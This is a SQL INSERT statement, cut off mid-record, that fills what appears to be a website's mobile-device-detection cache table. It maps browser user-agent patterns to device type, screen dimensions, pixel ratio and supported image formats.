INSERT INTO `xyhmu_mj_amdd_cache` VALUES ('Mozilla/5.0 (Linux; Android 7.*) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1722413252),('Mozilla/4.0 (compatible; Clever Internet Suite)','',1658081630),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A725F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1696434437),('Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748591432),('Mozilla/5.0 (compatible; Dataprovider.com)','',1747658146),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G973F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1742846646),('Mozilla/5.0 (Linux; Android 12; XQ-BQ52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1652980526),('Mozilla/5.0 (Linux; Android 12; SM-A515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1731940162),('Mozilla/5.0 (compatible; MSIE 6.0; PPC; Trident/3.0)','',1653094756),('Mozilla/5.0 (68K) AppleWebKit/* (KHTML, live Gecko) Chrome Safari/*','',1681875304),('Mozilla/5.0 (Linux i686) AppleWebKit/* (KHTML, live Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1681717079),('Mozilla/5.0 (Linux i686) Firefox/*','',1680870118),('Mozilla/5.0 (Linux x86_64) Firefox/*','',1677289183),('Mozilla/5.0 (Linux x86_64) Gecko/* Firefox/*','',1748485499),('Mozilla/5.0 (compatible; MSIE 3.0; 68K; Trident/4.0)','',1653156775),('Mozilla/5.0 (compatible; MSIE 6.0; 68K; Trident/2.0)','',1653198273),('Mozilla/5.0 (Linux x86_64) AppleWebKit/* (KHTML, live Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1678696634),('Mozilla/5.0 (68K) Firefox/*','',1734792315),('Mozilla/5.0 (Linux; Android 12; xx 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1653217542),('Mozilla/5.0 (Linux; Android 12; M2007J3SY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1665933771),('Mozilla/5.0 (Linux; Android 11; 2201117PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1734175472),('Mozilla/5.0 (Android 11; Mobile) Firefox/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1740408673),('Mozilla/5.0 (Linux; Android 4.*; HM NOTE 1W) AppleWebKit/* (KHTML, like Gecko)','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748403036),('Chrome/Soldier_0.3 (Windows NT 10.0)','',1653521669),('Mozilla/5.0 (Linux; Android 2.*; SC-02B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1679452478),('Mozilla/5.0 (Linux; Android 2.*; SC-02B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1679452478),('Mozilla/5.0 (Linux; Android 12; M2007J17G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1683110403),('Mozilla/5.0 (Linux; Android 12; M2002J9G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1661974810),('Mozilla/5.0 (Linux; Android 12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690821458),('Mozilla/5.0 (PPC) AppleWebKit/* (KHTML, live Gecko) Chrome Safari/*','',1680847758),('Mozilla/5.0 (Linux; Android 12; SM-A135F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1656834155),('Mozilla/5.0 (Linux; Android 12; 21081111RG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1676545175),('Mozilla/5.0 (Linux; Android 12; SM-S901B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1675154473),('Mozilla/5.0 (Linux; Android 12; SM-A715F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681282742),('Mozilla/5.0 (Linux; Android 8.*; AGS-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1653927789),('Mozilla/5.0 (Linux; Android 9; moto e5 xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1653996971),('Mozilla/5.0 (Linux; Android 12; M2102J20SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690059907),('Mozilla/5.0 (Linux; Android 12; SM-N970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690015536),('Mozilla/5.0 (Linux; Android 12; M2101K7AG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1676996807),('Mozilla/5.0 (Linux; Android 11; Armor 11 5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1654423072),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1698397398),('wp_is_mobile','',1686438220),('Mozilla/5.0 (Linux; Android 12; Pixel 4a (5G)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1654631224),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A715F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1671963373),('Mozilla/5.0 (Linux; Android 12; M2101K6G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1678817826),('Mozilla/5.0 (Linux; Android 12; SM-G990B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1722494512),('Mozilla/5.0 (Linux; Android 11; 21091116AG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1679083922),('Mozilla/5.0 (Linux; Android 12; SM-N986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1668616597),('Mozilla/5.0 (Linux; Android 12; ASUS_I006D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1655019992),('Mozilla/5.0 (Linux; Android 8.*; BLA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1659697504),('Mozilla/5.0 (Linux; Android 12; XQ-AU52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1666791729),('Mozilla/5.0 (linux; android 9; v1816a build/pkq1.180819) applewebkit/537.36 (khtml, like gecko) version/4.0 chrome/57','',1679495931),('Mozilla/5.0 (Linux; Android 12; M2012K11AG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1678252479),('Mozilla/5.0 (Android 10; Mobile) Firefox/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1737531008),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1657866032),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-N986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1665641627),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A525F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1699042410),('Mozilla/5.0 (Linux; Android 10; O3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1699190369),('Mozilla/5.0 (Linux; Android 12; SM-F711B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":880,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1667215151),('Mozilla/5.0 (Linux; Android 12; Pixel 4 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1655466753),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A528B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1708695876),('Mozlila/5.0 (Linux; Android 7.*; SM-G892A Bulid/NRD90M) AppleWebKit/* (KHTML, like Gecko) Chrome Moblie Safari/*','',1746343372),('Mozilla/5.0 (Linux; Android 11; 2201117TY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690449938),('Mozilla/5.0 (Linux; Android 11; 6156H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1684081113),('Mozilla/5.0 (Linux; Android 6.*; TERRA PAD 1004) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1655744524),('Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko','',1746378838),('Mozilla/5.0 (Linux; Android 12; 2109119DG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1678875802),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A135F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1661515414),('Mozilla/5.0 (Linux; Android 8.*; Fonos-O1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1656049519),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-N981B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1656060909),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1718517120),('Mozilla/5.0 (iPad; CPU OS 15 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1706355418),('Mozilla/5.0 (Linux; Android 10; CDY-NX9A; HMSCore 6.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1657288527),('Mozilla/5.0 (Linux; Android 11; SM-A035G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1684335075),('Mozilla/5.0 (Linux; Android 8.*; OPPO x20 70816.012) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1656527824),('Mozilla/5.0 (Linux; Android 11; SM-T515) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1683229028),('Mozilla/5.0 (Linux; Android 9.*; ZTE BA520) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747833884),('Mozilla/5.0 (Linux; Android 7.*; BLN-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1656684983),('Mozilla/5.0 (Linux; Android 12; SM-G975U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1656708750),('Mozilla/5.0 (Linux; Android 12; SM-A415F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1715182125),('Mozilla/5.0 (Linux; Android 12; Nokia 8.3 5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":960,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1656784959),('Mozilla/5.0 (Linux; Android 11; Nokia 7.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":811,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1664894520),('Mozilla/5.0 (Linux; Android 10; Hammer_Explorer) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1660629055),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G990B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1718461839),('Mozilla/5.0 (Linux; Android 12; M2007J3SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1691069261),('Mozilla/5.0 (Linux; Android 10; Lenovo TB-X505L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1688659329),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 6.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1657112137),('Mozilla/5.0 (iPhone; CPU OS 15 like Mac OS X)','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1657117284),('Mozilla/5.0 (Linux; Android 12; SM-S908B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1666898043),('Mozilla/5.0 (PPC) Firefox/*','',1693800604),('Mozilla/5.0 (Linux; Android 11; 2201116PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1678113008),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A536B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1697200750),('Mozilla/5.0 (Linux; Android 9; SM-T865) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1657435550),('Mozilla/5.0 (Linux; Android 12; XQ-AS52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1675068171),('Mozilla/5.0 (Linux; Android 12; 21121210G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1657462354),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1692292427),('Mozilla/5.0 (Linux; Android 12; M2101K9G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1673799656),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1657536211),('Mozilla/5.0 (iPhone; CPU iPhone OS 15 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* DuckDuckGo/7 Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1657547827),('Mozilla/5.0 (compatible; MSIE 1.0; 68K; Trident/3.0)','',1657735060),('Mozilla/5.0 (compatible; MSIE 4.0; 68K; Trident/5.0)','',1657737642),('Mozilla/5.0 (Linux; Android 12; M2103K19G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1661433630),('Mozilla/5.0 (Linux; Android 